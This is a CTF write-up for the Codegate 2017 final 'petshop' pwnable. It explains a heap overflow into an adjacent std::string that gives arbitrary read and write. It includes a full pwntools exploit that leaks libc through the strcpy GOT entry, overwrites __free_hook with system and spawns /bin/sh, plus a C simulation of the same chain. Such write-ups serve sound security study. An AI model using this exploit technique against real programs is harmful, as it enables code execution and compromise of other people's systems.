Codegate 2017 final petshop
Pwnable/CTF, 2018. 3. 22. 23:40

The vulnerability is a heap overflow and the difficulty is low. The overflow from the pet's feed field runs into the adjacent std::string object, so its {data pointer, length} pair becomes attacker-controlled. Pointing the pointer at a GOT entry (0x604088, strcpy) with length 8 and then showing the pet leaks a libc address; pointing it at __free_hook and renaming the pet writes system there (not sure why I went with free_hook, lol). Because the destructor (~basic_string) calls free on the data pointer, the last step is to stash "/bin/sh" at a known writable address (__malloc_hook is used only as scratch here), point the string at it, and delete the pet: free runs __free_hook, i.e. system("/bin/sh"). The libc offsets below are for the challenge's libc.

from pwn import *

def set_pet(name, sound, feed):
    p.sendlineafter(b'select:', b'4')
    p.sendlineafter(b'set:', b'1')
    p.sendlineafter(b':', name)
    p.sendlineafter(b':', sound)
    p.sendlineafter(b':', feed)   # no bound check: overflows into the name string object

p = process('./petshop')
p.sendlineafter(b':', b'1')
p.sendlineafter(b':', b'1')
p.sendlineafter(b'select:', b'6')
p.sendlineafter(b'name?', b'AAAA')

# 1. Overwrite the string's {data ptr, length} with {GOT entry of strcpy, 8},
#    then "show" (option 5) prints 8 bytes from the GOT: a libc leak.
set_pet(b'A', b'B', b'C' * 12 + p64(0x604088) + p64(0x8))
p.sendlineafter(b'select:', b'5')
p.recvuntil(b'person:')
strcpy = u64(p.recv(8))
libc_base = strcpy - 0x16bca0      # offsets for the challenge's libc
system = libc_base + 0x47dc0
free_hook = libc_base + 0x3dc8a8
malloc_hook = libc_base + 0x3dac10
print(hex(strcpy))
print(hex(libc_base))
print(hex(free_hook))

# 2. Point the string at __free_hook; "rename" (option 6) writes system() there.
set_pet(b'A', b'B', b'C' * 12 + p64(free_hook) + p64(8))
p.sendlineafter(b'select:', b'6')
p.sendlineafter(b'name?', p64(system))

# 3. Point the string at a writable scratch address and write "/bin/sh" into it.
set_pet(b'A', b'B', b'C' * 12 + p64(malloc_hook) + p64(8))
p.sendlineafter(b'select:', b'6')
p.sendlineafter(b'name?', b'/bin/sh\x00')

# 4. Delete the pet: ~basic_string frees the data pointer -> __free_hook -> system("/bin/sh").
p.sendlineafter(b'select:', b'2')
p.interactive()
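To make the primitive concrete, here is an added C simulation of the chain above. It is not the challenge binary and not the author's exploit: the struct layout, the fake GOT value, the hook variable standing in for __free_hook, the scratch buffer standing in for the __malloc_hook slot and the fake_system recorder are all constructed for illustration. What it shows is why a heap overflow into a std::string-like {pointer, length} pair is an arbitrary read (show) plus an arbitrary write (rename), and how the destructor's free turns a hooked free into system("/bin/sh").

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical pet record, shaped the way the payload implies: an inline feed
 * field followed by a std::string-like {data pointer, length} pair.
 * The real binary's struct is not on the page; this layout is an assumption. */
struct pet {
    char feed[12];
    char *name_ptr;     /* std::string's _M_p */
    size_t name_len;    /* std::string's _M_string_length */
};

/* Stand-ins for the process memory the exploit touches (all constructed). */
static uint64_t fake_got_strcpy = 0x00007f1234567890ULL;  /* GOT slot holding a libc address */
static void (*fake_free_hook)(void *) = NULL;              /* plays the role of __free_hook */
static char fake_scratch[16];                               /* plays the role of the __malloc_hook slot used as scratch */
static char last_command[32];

static void fake_system(void *cmd) {   /* plays the role of system(); just records its argument */
    snprintf(last_command, sizeof last_command, "%s", (const char *)cmd);
}

struct pet *pet_new(const char *name) {
    struct pet *p = calloc(1, sizeof *p);
    p->name_len = strlen(name);
    p->name_ptr = malloc(p->name_len + 1);
    memcpy(p->name_ptr, name, p->name_len + 1);
    return p;
}

/* Vulnerable "set pet": copies the feed without a bound, overflowing into the string object. */
void set_feed(struct pet *p, const void *src, size_t n) { memcpy(p->feed, src, n); }

/* "Show pet": emits name_len bytes from name_ptr; an arbitrary read once both are controlled. */
size_t show_name(const struct pet *p, void *out, size_t cap) {
    size_t n = p->name_len < cap ? p->name_len : cap;
    memcpy(out, p->name_ptr, n);
    return n;
}

/* "Rename": in-place copy into the existing buffer if it fits; an arbitrary write. */
int rename_pet(struct pet *p, const void *src, size_t n) {
    if (n > p->name_len) return -1;
    memcpy(p->name_ptr, src, n);
    return 0;
}

/* "Delete pet": what ~basic_string does, free() on the data pointer, honouring the hook. */
void pet_delete(struct pet *p) {
    if (fake_free_hook) fake_free_hook(p->name_ptr); else free(p->name_ptr);
    free(p);
}

/* Same payload shape as the exploit: filler up to the string object, then pointer, then length. */
static size_t build_payload(unsigned char *buf, void *target, size_t len) {
    size_t off = offsetof(struct pet, name_ptr);   /* 12 in the challenge binary; compiler-chosen here */
    uint64_t addr = (uint64_t)(uintptr_t)target, l = len;
    memset(buf, 'C', off);
    memcpy(buf + off, &addr, 8);
    memcpy(buf + offsetof(struct pet, name_len), &l, 8);
    return offsetof(struct pet, name_len) + 8;
}

/* Stage 1: point the name at the GOT slot, "show" it, read back the libc pointer. */
uint64_t stage_leak(void) {
    struct pet *p = pet_new("AAAA");
    char *orig = p->name_ptr;
    unsigned char payload[sizeof(struct pet)];
    uint64_t leaked = 0;
    size_t n = build_payload(payload, &fake_got_strcpy, 8);
    set_feed(p, payload, n);
    show_name(p, &leaked, sizeof leaked);
    free(orig);
    free(p);
    return leaked;
}

/* Stages 2-4: rename writes "system" into the free hook, then "/bin/sh" into scratch;
 * deleting the pet frees the scratch address, so the hook receives "/bin/sh". */
const char *stage_shell(void) {
    struct pet *p = pet_new("AAAA");
    char *orig = p->name_ptr;
    unsigned char payload[sizeof(struct pet)];
    void (*sys)(void *) = fake_system;
    size_t n = build_payload(payload, &fake_free_hook, sizeof sys);
    set_feed(p, payload, n);
    rename_pet(p, &sys, sizeof sys);
    n = build_payload(payload, fake_scratch, 8);
    set_feed(p, payload, n);
    rename_pet(p, "/bin/sh", 8);
    pet_delete(p);            /* ~basic_string -> free(fake_scratch) -> hook("/bin/sh") */
    free(orig);
    return last_command;
}

int main(void) {
    printf("leaked GOT value: 0x%llx\n", (unsigned long long)stage_leak());
    printf("free hook received: %s\n", stage_shell());
    return 0;
}
```

The filler length is taken from offsetof rather than hard-coded to 12, because the simulated struct gets compiler padding that the challenge binary evidently did not have; the pointer-then-length order after the filler is what matters for the primitive.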